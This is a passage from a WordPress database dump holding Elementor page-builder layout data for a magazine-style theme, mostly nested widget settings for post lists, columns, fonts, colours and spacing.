\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1207,439,'_elementor_version','0.4'),(1208,439,'_elementor_css','a:3:{s:4:\"time\";i:1508883166;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1210,440,'_elementor_edit_mode','builder'),(1211,440,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_fon